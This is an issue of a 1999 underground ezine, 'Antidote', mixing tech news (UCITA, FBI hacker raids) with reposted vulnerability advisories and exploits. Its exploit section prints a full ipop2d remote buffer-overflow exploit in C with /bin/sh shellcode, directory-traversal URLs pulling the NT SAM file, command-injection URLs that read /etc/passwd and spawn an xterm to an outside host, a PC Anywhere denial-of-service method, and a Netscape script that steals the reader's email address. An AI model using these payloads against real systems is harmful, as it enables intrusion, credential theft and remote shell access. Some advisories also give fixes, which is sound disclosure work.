Volume 2 Issue 7 6/4/99 ** ** ***** * * ** * * *** ** *** ** ** *** ** * ** ** * ** ******** ** **** ******** * ** *** **** ******** *** *** ** * *** * ******** *** * ** **** **** * ** *** ********* * **** ** * *** * ** ** **** ** ** ** **** ** ** ** * *** * ** ** ** ** ** ** ** ** ** ** ** *** ********* ** ** ** ** ** ** ** ** ** ******** * ** ** ** ** ** ** ** ** ** ** ******* * ** ** ** ** ** ** ** ** ** ** ** ***** ** ** ** ** ** ** ** ****** ** **** * * **** ** * *** *** ** *** * ***** **** ** ******* * ** ** *** *** *** *** ***** * ** http://www.thepoison.org/antidote bof_ptr = (long *)buffer; for (i = 0; i < bufsize - 4; i += 4) *(bof_ptr++) = get_sp() - offs; printf ("Creating termcap f1le\n"); printf ("b1tch is Fe3lin 1t.\n"; ------------------------------ In this issue of Antidote, we have over 620 subscribers and getting more everyday! The only thing that we ask of you when you read Antidote, is that you go to: www.thepoison.org/popup.html and click on our sponsors. One issue of Antidote takes us about a week to put together and going to our sponsor only takes you about 15 seconds (if that). So please go visit our sponsor because it is the only thing we ask of you. --=\\Contents\\=-- 0.00 - Beginning 0.01 - What? 0.02 - FAQ 0.03 - Shouts 0.04 - Writing 1.00 - News 1.01 - UCITA almost Approved 1.02 - FBI missing the Real Hacking Threat? 1.03 - Microsoft Employee Raided 2.00 - Exploits (new & older) 2.01 - nt.ras_rras.password.txt 2.02 - NetIQ.txt 2.03 - compaq_insight.server.txt 2.04 - pc_anywhere.dos.txt 2.05 - ie.color.htm.txt 2.06 - sdi_pop2.c.txt 2.07 - netscape.view_source.htm.txt 2.08 - whois_raw.cgi.txt 3.00 - Misc 3.01 - ZKS Freedom AIP ------------------------------ 0.01 --=\\What?\\=-- What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on there hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc, then you might want to go to your local bookstore and see if they carry '2600'. ------------------------------ 0.02 --=\\FAQ\\=-- Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions and if the question isn't on here or doesn't make sense, then you can e-mail us with your question. > What exactly is "Antidote"? See section 0.01 for a complete description. > I find Antidote to not be shot for the beginner or does not teach you the basics, why is that? Antidote is for everyone, all we are basically is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles that are in here are recieved second hand (sent to us) and we very rarely edit anyone's articles. > I just found Antidote issues on your webpage, is there anyway I can get them sent to me through e-mail? Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will recieve a link to the current Antidote (where you can view it). > If I want to submit something, are there any 'rules'? Please see section 0.03 for a complete description. > If I submitted something, can I remain anonymous? Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say. > I submitted something and I didn't see it in the current/last issue, why is that? It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues off Antidote. > Can I submit something that I didn't "discover" or "write"? Yes you can, we take information that is written by anyone regardless if you wrote it or not. Well thats it for our FAQ. If you have a question that is not on here or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month. ------------------------------ 0.03 --=\\Shouts\\=-- These are just some shout outs that we feel we owe to some people. Some are individuals and Some are groups in general. If you are not on this list and you feel that For some reason you should be, then please contact Lord Oak and he will post you on here and we are sorry for the Misunderstanding. Well, here are the shout outs: Lord Oak EazyMoney Duece opt1mus PBBSER oX1dation Forlorn Retribution 0dnek www.thepoison.org Like we said above, if we forgot you and/or you think you should be added, please e-mail lordoak@thepoison.org and he will be sure to add you. ------------------------------ 0.04 --=\\Writing\\=-- As many of you know, we are always open to articles/submittings. We will take almost anything that has to do with computer security. This leaves you open for: -Protecting the system (security/securing) -Attacking the system (hacking, exploits, flaws, etc....) -UNIX (really anything to do with it...) -News that has to do with any of the above.... The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please note that if we recieve two e-mails with the same topic/idea then we will use the one that we recieved first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic so that way you don't waste your time on writing something that won't be published. An example of this would be: If Joe sends me an e-mail with the topic being on hacking hotmail accounts on thursday. And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it). ------------------------------ _________________________________ ) ___ ( ( //___/ / // ) ) // ) ) ) ) /____ / // / / __ / / ( ( / / // / / ) ) ) ) / / ((___/ / ((___/ / ( ( http://www.403-security.org ) ) For the latest hacks and news ( (___________________________________) 1.01 --=\\UCITA almost Approved\\=-- [www.infoworld.com] Imagine the horror of walking into work one day to find your software vendor holding your company hostage by threatening to shut down your mission-critical systems unless you concede to its terms. Sounds illegal, right? Perhaps not. Although many IT professionals are unaware of it, that practice will become legally defensible if new legislation called the Uniform Computer Information Transactions Act, or UCITA, is approved. UCITA is a proposed law for applying consistent rules to computer software licenses across all 50 states. It would * give vendors the right to repossess software by disabling it remotely; * make the terms of shrink-wrapped licenses more enforceable; * prevent the transfer of licenses from one party to another without vendor permission; * allow vendors to disclaim warrantees; * outlaw reverse engineering. Proponents of the law, primarily software vendors, say it is time for a uniform law that applies directly to software licenses. Critics, including technology consumer groups such as the Society of Information Managers (SIM), say UCITA is fatally flawed and should be killed. Other trade organizations representing the motion picture industry, newspapers, magazines, and the music recording industry, have joined SIM in opposing UCITA. In July, a state attorney organization known as the National Conference of Commissioners on Uniform State Laws (NCCUSL) will meet in Denver to approve UCITA. If the organiza- tion gives the proposal a green light, a few state legislatures are likely to rubber- stamp it by the end of the year and UCITA will become law, according to UCITA experts. This fast time table has opponents up in arms. Although SIM is in favor of a law to govern software licensing, it says it believes UCITA cannot be fixed. "This law would significantly increase the level of the burden on the IT procurement function and significantly increase the cost of procurement -- both in staff costs and out-of-pocket costs," says Susan Nycum, a SIM member and an attorney at law firm Baker & McKenzie, in Palo Alto, Calif. Although many software vendor representatives attended development meetings to discuss the law and lobbied its creators, most attendees contacted by InfoWorld refused to discuss their views on the record. And although this law threatens to profoundly affect how IT departments in both large and small companies do business, most IT professionals remain unaware of the law and its ramifications. "We were naive about how things were handled," says Randy Roth, a SIM member who also works at the Principal Financial Group, in Des Moines, Iowa. "We thought, gee, when people are writing these laws they are making sure they are balanced and somebody is watching out for our best interests." http://www.infoworld.com/cgi-bin/displayStory.pl?/features/990531ucita.htm ------------------------------ 1.02 --=\\FBI missing the Real Hacking Threat?\\=-- [www.zdnet.com] With the FBI executing 16 search warrants in 12 cities, U.S. attorney Paul Coggins said Wednesday the Federal Government's "massive" hunt for the hackers responsible for a string of high-profile hacks of government sites was "the most far reaching hacking investigation ever conducted by the Department of Justice." Several security watchers, however, consider the manhunt a distraction, and say that the biggest threats to online security are the hackers who aren't making headlines -- an observation supported by Wednesday's hack of the Department of Energy's Brookhaven National Laboratory. In the Brookhaven hack, intruders claiming to be the Posse replaced the laboratory's home page with a picture of TV personality Rosie O'Donnell and a treatise. According to security watchers, the Posse is more sophisticated than the hackers behind previous government site hacks. The Posse's note prominently thanked the script kiddies, who use script-based programs to break into servers, for grabbing the attention of the FBI. "While you have been keep- ing the FBI (Federal Bureau Of Instigation) and SS (Secret Cervix) busy tracking down 14 year old hacker hopefuls; we have spent our time burrowing ourselves deep within Corporate America," the Posse's note read at one point. While the Brookhaven hack was quickly removed, MSNBC reported that the site itself was taken offline between 5:30 a.m. and 1 p.m. PT. 'The biggest threats' "The guys who broke into the White House site, it's like living in D.C., running over to the White House and spray painting it," said B.K. DeLong, a security consultant in Boston. "The biggest threats are the hackers that aren't making themselves known." "There's a limit to what they (the script kiddies) could do," DeLong noted. "But if these guys are getting in, what about the really experienced guys?" An FBI official denied that FBI resources are being stretched thin by investigations into comparatively minor hacking incidents. "That's an erroneous statement," said FBI spokeswoman Debbie Weierman. "We take any type of intrusion to a government computer very seriously." Agency officials "understand that some individuals may simply want to make a statement" by putting up digital graffiti, but by accessing government systems, "they are still committing a crime," she said. While there had been speculation that the Department of Defense would pull its Web site down to guard against hacking incidents, an agency spokesman said Wednesday there's no plan for a wholesale shutdown of the site. "Only certain pages are being taken down" to gauge their security, DoD spokesman Glenn Flood said. Public information on the site will remain up during the testing, set to begin later Wednesday and be concluded later this week, he said. http://www.zdnet.com/zdnn/stories/news/0,4586,2269398,00.html ------------------------------ 1.03 --=\\Microsoft Employee Raided\\=-- [www.msnbc.com] JEFFREY ROBERSON, 19, was a self-described angry little kid two years ago, fairly well- known as VallaH on the hacking scene, dabbling in writing hacker software tools. At his worst, he says, he wrote software that crashed victim’s computers, forcing them to reboot. Then a Microsoft employee saw his programming code, was duly impressed and invited VallaH to Redmond, Wash. Over time, Roberson was convinced to put his skills to good use and took the job. He’s spent the past year working on Windows 2000, testing for interoperability with Unix systems his specialty. But he also stayed involved in the hacker scene. He says he hadn’t done anything illegal since taking his job at Microsoft; in fact he says he spent his time trying to convince other angry little kids that they could be creative instead of destructive. I talked to them because I wanted to try to help them program. But someone passed his handle to the FBI recently. Then his Seattle-area apartment was raided May 26 in the hacker sweep, and VallaH’s life instantly changed. His assignment at Microsoft was immediately terminated he’s now pleading his case with the company, hoping to get a new assignment. http://www.msnbc.com/news/275876.asp ------------------------------ 10001010100101110101010101001011101010101000 0 1 1 Y88b Y88 888 888 888 88e e88'Y88 0 1 Y88b Y8 888 888 888 888b d888 'Y 1 0 b Y88b Y 8888888 888 8888D C8888 1 0 8b Y88b 888 888 888 888P Y888 ,d 1 1 88b Y88b 888 888 888 88" "88,d88 0 1 1 1 http://www.nudehackers.com 0 0 0 01001010110101010001011010010111010100101011 2.01 --=\\nt.ras_rras.password.txt\\=-- On March 20th, Dieter Goepferich [dieter.goepferich@bigfoot.com] discovered a vulnerability involving both RAS and RRAS. This was subsequently reported in Heise Online, a German publication; http://www.heise.de/newsticker/data/cp-12.04.99-000/ http://www.heise.de/newsticker/data/hos-15.04.99-000/ Dieter originally reported it via some "product improvement suggestion" web form on www.microsoft.de back in March. Together we informed Microsoft Security (secure@microsoft.com) back in April. By default the registry key is only accessible to Administrator and the user/owner of the passwords, but it represents a potential threat and a location of password information which would not otherwise be expected. See; http://www.microsoft.com/security/bulletins/ms99-017.asp for the complete write up including fix locations. There are two KB articles about this (one for RAS, and another for RRAS). They were not yet available at the time of writing. RAS http://support.microsoft.com/support/kb/articles/q230/6/81.asp RRAS http://support.microsoft.com/support/kb/articles/q233/3/03.asp Russ ------------------------------ 2.02 --=\\NetIQ.txt\\=-- AppManager is a product which enables an enterprise to monitor the performance and availability of Windows NT server services such as Exchange, SQL, etc. It does this via an agent on the target machine which reports back to a console. The agents monitor for things like low disk space, misbehaving services, and so on. Like most products that follow a manager/agent architecture, the agents must use an account with Administrator privileges in order to do their job. The problem is that when the authentication occurs, the userid and password are passed in clear text, meaning that anyone with a sniffer can read it as it goes across the wire. The other problem is that when someone with access to the AppManager console goes to look at a job, all he or she must do is right-click on the job, select Properties, select the View tab, and voila! The userid and password that the job is using is right there for all to see. With version 3.0 they have replaced the password with asterisks, but the company conceded that if someone were to copy the asterisks and paste them into a text file then the password would be displayed instead of the asterisks! More security through obscurity. The only fix so far is for an AppManager administrator to go into the Properties and manually backspace over the password to remove it. Once this is done it will not appear again on any of the consoles. However, if an "agent installation" job is run, the password WILL be displayed in Properties, but only for the duration on the install, which is usually between ten and fifteen minutes. There is currently no way to prevent this. According to the company this is a "known issue." After some more discussion I found that they have known about this for two years, yet apparently have not done anything to rectify it. They said that encrypting the authentication sequence traffic is difficult to do which is one of the reasons why they haven't fixed it yet. If their programmers can't figure out in two years how to encrypt traffic then I think a another product should be chosen. ------------------------------ 2.03 --=\\compaq_insight.server.txt\\=-- Problem: The web server included in Compaq Insight Manager could expose sensitive information. Threat: Anyone that have access to port 2301 where Compaq Insight Manager is installed could get unrestricted access to the servers disk through the "root dot dot" bug. Platform: Detected on Windows NT and Novell Netware servers running on Compaq hardware. Solution: Disable the Compaq Insight Manager web server or restrict anonymous access. Vulnerability Description ------------------------- When installing Compaq Insight Manager a web server gets installed. This web server runs on port 2301 and is vulnerable to the old "root dot dot" bug. This bug gives unrestricted access to the vulnerable server?s disk. It could easily get exploited with one of the URLs: http://vulnerable-NT.com:2301/../../../winnt/repair/sam._ http://vulnerable-Netware.com:2301/../../../system/ldremote.ncf (How many dots there should be is install-dependent) Solution -------- You could probably fix the problem by restricting anonymous access to the Compaq Insight Manager web server. If you are not using the web server, Infosec recommends disabling the service. Background ---------- Infosec gives the credits to Master Dogen who first reported the problem (Windows NT and Compaq Insight Manager) to us and wanted us go public with a vulnerability report. Infosec have found that Novell Netware with Compaq Insight Manager have the same problem but is not as common as on Windows NT. Compaq Sweden was informed about this problem april 26, 1999. Gabriel Sandberg, Infosec gabriel.sandberg@infosec.se ------------------------------ 2.04 --=\\pc_anywhere.dos.txt\\=-- Hello all,This is my first post to the group so I'll try to keep it as brief as possible. Searching through the bugtraq archives, I came across articles 001732, 001734, 001737, and 001739 regarding PC Anywhere. So, I fired up my telnet client, pointed it at port 5631 on a non-production host, and pasted about 512kb of garbage (I copied & pasted a dll I opened in notepad) into it when PC Anywhere responded with "Please press ". About 200k through this dump, PC Anywhere hangs, utilizing 100% of the CPU, rendering the target host useless but not crashing it. There's your DoS. I ran this attack over TCP/IP against a couple of fully patched NT 4.0 Workstations (SP4), and a couple of fully patched NT 4.0 Servers (SP4), with 802up_a, 802up_b, and hostup_b applied to PC Anywhere, RAS was not installed on any of the hosts. I got the same results on all machines. I got in touch with Symantec development and found out that they do have a fix for this problem, it's a patched aw32tcp.dll, it just hasn't made it to their website yet. I have applied this fix to several machines (all with the afore mentioned PC Anywhere patches applied) and it does indeed fix the problem. Hope this info will help. Thanks for your time. Chris ------------------------------ 2.05 --=\\ie.color.htm.txt\\=-- This is a new exploit which affects Microsoft Internet Explorer 5.0. When you enter the html document below, IE will freeze and you have to close it with ctrl + alt + del. //THR -----------Cut here------color.htm--------Start--------- -----------Cut here------color.htm--------End--------- http://fly.to/unixhacking ------------------------------ 2.06 --=\\sdi_pop2.c.txt\\=-- /* * Sekure SDI (Brazilian Information Security Team) * ipop2d remote exploit for linux (Jun, 02 1999) * * by c0nd0r * * (read the instructions below) * * Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr, * falcon, vader, c_orb, marty(nordo!) and minha malinha! * also to #uground (irc.brasnet.org) and #SDI (efnet), * guys at el8.org, toxyn.org, pulhas.org * * Sincere Apologizes: duke (for the mistake we made with the wu-expl), * your code rocks. * * Usage: * * SDI-pop2 [offset] * * where imap_server = IMAP server at your box (or other place as well) * user = any account at your box * pass = the account's password * offset = 0 is default -- increase if it's necessary. * * Example: (netcat rocks) * * (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109 * * ---------------------------------------------------------------- * HOWTO-exploit: * * In order to gain remote access as user nobody, you should set * an IMAP server at your box (just edit the inetd.conf) or at * any other machine which you have an account. * * During the anonymous_login() function, the ipop2d will set the * uid to user nobody, so you are not going to get a rootshell. * ---------------------------------------------------------------- * */ #include /* * (shellcode) * * jmp 0x1f * popl %esi * movl %esi,0x8(%esi) * xorl %eax,%eax * movb %eax,0x7(%esi) * movl %eax,0xc(%esi) * movb $0xb,%al * movl %esi,%ebx * leal 0x8(%esi),%ecx * leal 0xc(%esi),%edx * int $0x80 * xorl %ebx,%ebx * movl %ebx,%eax * inc %eax * int $0x80 * call -0x24 * .string \"/bin/sh\" * grab your shellcode generator at www.sekure.org */ char c0d3[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff/bin/sh"; main (int argc, char *argv[] ) { char buf[2500]; int x,y=1000, offset=0; long addr; char host[255], user[255], pass[255]; int bsize=986; if ( argc < 4) { printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n"); printf ( "usage: (SDI-pop2 [offset];cat) | nc lame.org 109\n"); exit (0); } snprintf ( host, sizeof(host), "%s", argv[1]); snprintf ( user, sizeof(user), "%s", argv[2]); snprintf ( pass, sizeof(pass), "%s", argv[3]); if ( argc > 4) offset = atoi ( argv[4]); /* gimme the ret + offset */ addr = 0xbffff3c0 + offset; fprintf ( stderr, "0wning data since 0x%x\n\n", addr); /* calculation of the return address position */ bsize -= strlen ( host); for ( x = 0; x < bsize-strlen(c0d3); x++) buf[x] = 0x90; for ( y = 0; y < strlen(c0d3); x++, y++) buf[x] = c0d3[y]; for ( ; x < 1012; x+=4) { buf[x ] = addr & 0x000000ff; buf[x+1] = (addr & 0x0000ff00) >> 8; buf[x+2] = (addr & 0x00ff0000) >> 16; buf[x+3] = (addr & 0xff000000) >> 24; } sleep (1); printf ( "HELO %s:%s %s\r\n", host, user, pass); sleep (1); printf ( "FOLD %s\r\n", buf); } ------------------------------ 2.07 --=\\netscape.view_source.htm.txt\\=-- There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document. Vulnerabilites: Browsing local directories Reading user's cache Reading parsed HTML files Reading Netscape's configuration ("about:config") including user's email address, mail servers and password. Probably others This vulnerability may be exploited by using HTML email message. Workaround: Disable JavaScript Netscape is notified about the problem. Demonstration is available at: http://www.nat.bg/~joro/viewsource.html Regards, Georgi Guninski http://www.nat.bg/~joro http://www.whitehats.com/guninski [ Part 2: "Attached Text" ] [ The following text is in the "koi8-r" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document. Vulnerabilites: _________________________________________________________________________________________________________________________________ Browsing local directories Reading user's cache Reading parsed HTML files Reading Netscape's configuration ("about:config") including user's email address, mail servers and password. Probably others This vulnerability may be exploited by using HTML email message. _________________________________________________________________________________________________________________________________ Workaround: Disable JavaScript _________________________________________________________________________________________________________________________________ This demonstration tries to find your email address, it may take some time. Written by Georgi Guninski _________________________________________________________________________________________________________________________________ s="view-source:wysiwyg://1/javascript:s='vvvv>&>"" +"" +" blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;" +"setTimeout(\" " +"for(i=0;i'"; //a=window.open(s); location=s; ----------------------------------------------------------------------------------------------------- There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.
Vulnerabilites:
Browsing local directories
Reading user's cache
Reading parsed HTML files
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.
Probably others

This vulnerability may be exploited by using HTML email message.
Workaround: Disable JavaScript
This demonstration tries to find your email address, it may take some time.

Written by Georgi Guninski
------------------------------ 2.08 --=\\whois_raw.cgi.txt\\=-- Hi, sorry if this has already been known. There is a problem in whois_raw.cgi, called from whois.cgi. whois_raw.cgi is part of cdomain v1.0. I don't know if new versions are vulnerable. #!/usr/bin/perl # # whois_raw.cgi Written by J. Allen Hatch (zone@berkshire.net) # 04/17/97 # # This script is part of the cdomain v1.0 package which is available at: # http://www.your-site.com/~zone/whois.html ... require ("/usr/lib/perl5/cgi-lib.pl"); ... $fqdn = $in{'fqdn'}; # Fetch the root name and concatenate # Fire off whois if ($in{'root'} eq "it") { @result=`$whois_cmd_it $fqdn`; } elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") { @result="Dettagli non disponibili per il dominio richiesto."; } else { @result=`$whois_cmd $fqdn`; } ... The exploit is banal and well known problem: http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0 antirez md5330@MCLINK.IT ------------------------------ 3.01 --=//ZKS Freedom AIP//=-- Although the ZKS Freedom AIP protocol (as described in version 1.0 of the ZKS whitepaper) is conceptually similar to the PipeNet protocol, there are several attacks against ZKS which PipeNet is not susceptible to. The reason is that PipeNet uses end-to-end traffic padding, whereas ZKS only uses link padding. I came up with several attacks against link padding systems while developing PipeNet, which is why I ultimately choose end-to-end padding. However one can argue that end-to-end padding is too costly, and that these attacks are not practical because they require a global observer or the cooperation of one or more of the anonymous router (AIP) operators. ZKS has not publicly made this argument, but since they are probably aware of these earlier attacks they must have followed its reasoning. I hope the practicality of the new attack presented here will change their mind. In this attack, a user creates an anonymous route from himself through a pair of AIPs back to himself. He then increases the traffic through this route until total traffic between the pair of AIPs reach the bandwidth limit set by the ZKS Traffic Shaper. At this point the AIPs no longer send any padding packets to each other, and the real traffic throughput between them can be deduced by subtracting the traffic sent by the attacker from the bandwidth limit. This attack implies that link padding buys virtually no security. An attacker, without access to network sniffers or cooperation of any AIP operator, can strip off link padding and obtain real-time throughput data between all pairs of AIPs. If end-to-end padding is not used, this data would correlate with traffic throughput of individual users, and statistical analysis could then reveal their supposedly anonymous routes. ------------------------------ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- . Quote #1- . . . . "I got root on port 25 on your computer!" . . -Carolyn Mienel . . . . Quote made up by Lord Oak. . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ------------------------------ Please visit: www.thepoison.org/popup.html and click on our sponsors because we have to pay the bills on thepoison.org somehow! _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _| _| _| _| _| _| _| Antidote is an HNN Affiliate _| _| http://www.hackernews.com _| _| _| _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission is needed before using.